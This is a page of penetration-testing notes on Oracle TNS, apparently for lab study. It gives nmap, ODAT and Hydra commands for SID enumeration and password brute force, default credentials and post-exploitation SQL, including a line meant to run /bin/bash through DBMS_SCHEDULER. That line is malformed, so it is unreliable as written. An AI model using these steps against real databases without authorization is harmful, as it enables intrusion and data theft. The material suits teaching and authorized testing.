Oracle TNS Pentesting Notes

Protocol Overview

Basic Information

Port: TCP 1521 (default)
Protocol Type: Application layer
Purpose: Database communication protocol for Oracle
Security: Supports encryption, access controls, and authentication

Protocol Features

Network Protocols
- TCP/IP
- UDP
- IPX/SPX
- AppleTalk
Security Features
- SSL/TLS encryption
- IPv6 support
- Access control lists
- PL/SQL restrictions

Initial Enumeration

Port Scanning

# Basic Nmap scan
nmap -p1521 -sV <target>

# Aggressive scan with scripts
nmap -p1521 -sV -sC -A <target>

# All Oracle scripts
nmap -p1521 --script oracle-* <target>

Banner Grabbing

# Using TNSPing
tnsping <target>

# Using Nmap
nmap -p1521 -sV --script oracle-sid-brute <target>

# Using ODAT
./odat.py tnscmd -s <target> -p 1521

Anonymous/Default Access

Testing Default SIDs

# Using ODAT
./odat.py sidguesser -s <target> -p 1521

# Using Nmap
nmap -p1521 --script oracle-sid-brute <target>

# Manual connection
sqlplus scott/tiger@<target>:1521/ORCL

Common Default SIDs

ORCL
XE
PROD
DEV
TEST

Brute Force Attacks

Using ODAT

# Password guessing
./odat.py passwordguesser -s <target> -p 1521 -d XE

# Dictionary attack
./odat.py passwordguesser -s <target> -p 1521 -d XE --accounts-file accounts.txt

# Test multiple SIDs
./odat.py passwordguesser -s <target> -p 1521 -d ALL

Using Hydra

# Basic authentication
hydra -L users.txt -P passwords.txt oracle-listener://<target>

# Target specific SID
hydra -L users.txt -P passwords.txt oracle-sid://<target>/ORCL

Tool Installation

# Install ODAT and dependencies
sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update

# Install Oracle Instant Client
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip

# Set environment
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH

# Install Python dependencies
pip3 install cx_Oracle
pip3 install colorlog termcolor passlib python-libnmap pycryptodome

Common NSE Scripts

# SID enumeration
nmap -p1521 --script oracle-sid-brute <target>

# TNS version
nmap -p1521 --script oracle-tns-version <target>

# Brute force
nmap -p1521 --script oracle-brute --script-args oracle-brute.sid=ORCL <target>

# Enumerate users
nmap -p1521 --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL <target>

Configuration Files

Server-side Files

# Listener configuration
$ORACLE_HOME/network/admin/listener.ora

# Security configuration
$ORACLE_HOME/network/admin/sqlnet.ora

# Access control
$ORACLE_HOME/network/admin/protocol.ora

Client-side Files

# Connection configuration
$ORACLE_HOME/network/admin/tnsnames.ora

# SQL*Net configuration
$ORACLE_HOME/network/admin/sqlnet.ora

Example Configurations

listener.ora

LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = orcl.inlanefreight.htb)(PORT = 1521))
      (ADDRESS = (PROTOCOL = IPC)(KEY = EXTPROC1521))
    )
  )

tnsnames.ora

ORCL =
  (DESCRIPTION =
    (ADDRESS_LIST =
      (ADDRESS = (PROTOCOL = TCP)(HOST = 10.129.11.102)(PORT = 1521))
    )
    (CONNECT_DATA =
      (SERVER = DEDICATED)
      (SERVICE_NAME = orcl)
    )
  )

Common Vulnerabilities

Default Credentials:
- SYSTEM/MANAGER
- SYS/CHANGE_ON_INSTALL
- SCOTT/TIGER
Configuration Issues:
- Weak passwords
- Default SIDs
- Unpatched vulnerabilities
- Exposed listeners
Known Attack Vectors:
- TNS Poison
- Password brute force
- SID enumeration
- PL/SQL injection

Post Exploitation

Information Gathering

-- Check current user privileges
SELECT * FROM user_role_privs;

-- List all users
SELECT * FROM all_users;

-- View database version
SELECT * FROM v$version;

-- List available databases
SELECT * FROM v$database;

Privilege Escalation

-- Check for DBA role
SELECT * FROM user_role_privs WHERE granted_role='DBA';

-- Execute system commands (if allowed)
SELECT DBMS_SCHEDULER.create_job('CMD','EXECUTABLE','/bin/bash');

-- Check for accessible PL/SQL procedures
SELECT * FROM all_procedures WHERE owner='SYS';

Common Response Codes

Code

Meaning

ORA-01017

Invalid username/password

ORA-12541

No listener

ORA-12505

SID not found

ORA-28000

Account locked

ORA-01031

Insufficient privileges

Best Practices for Pentesting

Initial Reconnaissance:
- Identify TNS version
- Enumerate SIDs
- Check for default credentials
- Test listener status
Deep Enumeration:
- Map database structure
- List available schemas
- Check user privileges
- Identify sensitive data
Documentation:
- Record found SIDs
- Note vulnerable configurations
- Document credentials
- Save SQL query results
Risk Assessment:
- Evaluate data sensitivity
- Assess privilege levels
- Consider business impact
- Prioritize findings

Common Tools Summary

Enumeration:
- ODAT
- TNSPing
- Nmap NSE scripts
- SQLplus
Exploitation:
- ODAT modules
- Metasploit
- Custom SQL queries
- SQLplus
Post-Exploitation:
- SQLplus
- ODAT
- Custom PL/SQL scripts
- Database administration tools

PreviousIPMI Pentesting Notes NextMSSQL Pentesting Notes

hashtagProtocol Overview

hashtagBasic Information

hashtagProtocol Features

hashtagInitial Enumeration

hashtagPort Scanning

hashtagBanner Grabbing

hashtagAnonymous/Default Access

hashtagTesting Default SIDs

hashtagCommon Default SIDs

hashtagBrute Force Attacks

hashtagUsing ODAT

hashtagUsing Hydra

hashtagTool Installation

hashtagCommon NSE Scripts

hashtagConfiguration Files

hashtagServer-side Files

hashtagClient-side Files

hashtagExample Configurations

hashtaglistener.ora

hashtagtnsnames.ora

hashtagCommon Vulnerabilities

hashtagPost Exploitation

hashtagInformation Gathering

hashtagPrivilege Escalation

hashtagCommon Response Codes

hashtagBest Practices for Pentesting

hashtagCommon Tools Summary

Protocol Overview

Basic Information

Protocol Features

Initial Enumeration

Port Scanning

Banner Grabbing

Anonymous/Default Access

Testing Default SIDs

Common Default SIDs

Brute Force Attacks

Using ODAT

Using Hydra

Tool Installation

Common NSE Scripts

Configuration Files

Server-side Files

Client-side Files

Example Configurations

listener.ora

tnsnames.ora

Common Vulnerabilities

Post Exploitation

Information Gathering

Privilege Escalation

Common Response Codes

Best Practices for Pentesting

Common Tools Summary